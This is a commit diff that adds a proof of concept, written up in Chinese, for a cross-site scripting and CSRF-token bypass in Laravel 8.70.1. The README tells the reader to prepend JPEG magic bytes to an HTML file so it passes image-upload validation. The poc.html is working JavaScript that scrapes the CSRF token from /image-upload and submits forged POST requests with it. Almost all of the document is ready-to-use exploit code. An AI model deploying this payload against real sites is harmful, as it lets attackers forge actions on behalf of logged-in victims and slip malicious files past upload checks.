add PHP Laravel 8.70.1 跨站脚本攻击（XSS）

Laravel/PHP Laravel 8.70.1--XSS 漏洞/README.MD

@@ -0,0 +1,7 @@
+# PHP Laravel 8.70.1 跨站脚本攻击（XSS）
+
+> poc 可绕过Laravel 的图像上传
+
+## 利用步骤
+1. 利用16进制编辑器（01editor），添加  `FF D8 FF E0` 到文件开头
+2. 将poc 保存为html ，上传

Laravel/PHP Laravel 8.70.1--XSS 漏洞/poc.html

@@ -0,0 +1,52 @@
+ÿØÿà<html>
+<head>
+    <title>Laravel Csrf Bypass</title>
+</head>
+<body>
+<script>
+    function submitFormWithTokenJS(token) {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", POST_URL, true);
+
+        // Send the proper header information along with the request
+        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+
+        // This is for debugging and can be removed
+        xhr.onreadystatechange = function() {
+            if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+                console.log(xhr.responseText);
+            }
+        }
+        //
+        xhr.send("_token=" + token + "&desiredParameter=desiredValue");
+    }
+
+    function getTokenJS() {
+        var xhr = new XMLHttpRequest();
+        // This tels it to return it as a HTML document
+        xhr.responseType = "document";
+        // true on the end of here makes the call asynchronous
+        //Edit the path as you want
+        xhr.open("GET", "/image-upload", true);
+        xhr.onload = function (e) {
+            if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+                // Get the document from the response
+                page = xhr.response
+                // Get the input element
+                input = page.getElementsByTagName("input")[0];
+                // Show the token
+                alert("The token is: " + input.value);
+                // Use the token to submit the form
+                submitFormWithTokenJS(input.value);
+            }
+        };
+        // Make the request
+        xhr.send(null);
+    }
+    getTokenJS();
+
+    var POST_URL="/"
+    getTokenJS();
+
+</script>
+</html>